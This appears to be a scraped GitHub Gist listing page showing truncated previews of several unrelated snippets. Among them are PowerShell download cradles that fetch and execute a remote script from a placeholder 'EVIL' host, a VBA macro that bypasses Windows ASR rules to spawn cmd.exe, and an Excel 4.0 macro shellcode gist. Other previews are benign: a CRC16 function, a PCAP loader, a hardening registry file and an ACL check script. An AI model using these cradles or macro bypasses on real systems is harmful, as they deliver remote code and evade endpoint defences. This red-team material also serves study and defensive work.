Skip to content

Instantly share code, notes, and snippets.

View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
willurd /
Last active Sep 30, 2022
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
infosecn1nja / ASR Rules Bypass.vba
Last active Sep 29, 2022
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
X-C3LL / FreshyCalls-VBA.vba
Created Sep 4, 2022
Retrieving SSN for syscalling in VBA following FreshyCalls technique
View FreshyCalls-VBA.vba
' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)
'Based on:
oysstu /
Last active Sep 23, 2022
Implementation of crc16 (CRC-16-CCITT) in python
def crc16(data: bytes, poly=0x8408):
CRC-16-CCITT Algorithm
data = bytearray(data)
crc = 0xFFFF
for b in data:
cur_byte = 0xFF & b
for _ in range(0, 8):
if (crc & 0x0001) ^ (cur_byte & 0x0001):
multiplex3r /
Last active Sep 13, 2022
Load a PCAP into neo4j with scapy
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
pkt = packet.split()
Arno0x / shellcode.xlsm
Last active Aug 31, 2022
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
wdormann / dangerous.reg
Created Aug 11, 2022
Have Windows treat dangerous files as, well, dangerous. List courtesy @Laughing_Mantis
View dangerous.reg
Windows Registry Editor Version 5.00
jtriley /
Created Jul 26, 2011
Get current terminal size on Linux, Mac, and Windows
#!/usr/bin/env python
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" getTerminalSize()
wdormann / acltest.ps1
Created May 1, 2018
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
View acltest.ps1
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
# This prints a table of ACLs
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights